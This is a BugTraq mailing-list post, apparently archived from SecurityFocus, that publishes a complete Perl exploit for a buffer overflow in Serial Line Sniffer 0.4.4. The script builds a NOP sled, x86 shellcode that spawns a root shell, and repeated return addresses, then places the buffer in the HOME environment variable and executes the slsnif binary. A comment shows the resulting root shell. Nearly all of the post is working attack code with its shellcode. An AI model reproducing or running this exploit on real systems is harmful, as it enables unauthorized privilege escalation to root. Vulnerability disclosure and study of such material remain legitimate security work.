BugTraq
Serial Line Sniffer 0.4.4 Buffer Overflow Jan 11 2006 06:22AM
Sintigan shellcoders com
Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl

# Author: Sintigan (at) shellcoders (dot) com [email concealed]
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
#
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
#
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot
#

#!/usr/bin/perl
$shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2
f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

$buf = 288;
$ret = 0xbffff3a0;
$nop = "\x90";
$offset = -250;

if (@ARGV == 1) { $offset = $ARGV[0]; }

for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;
$addr = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $buf; $i += 4) {
$buffer .= $addr;
}
$ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus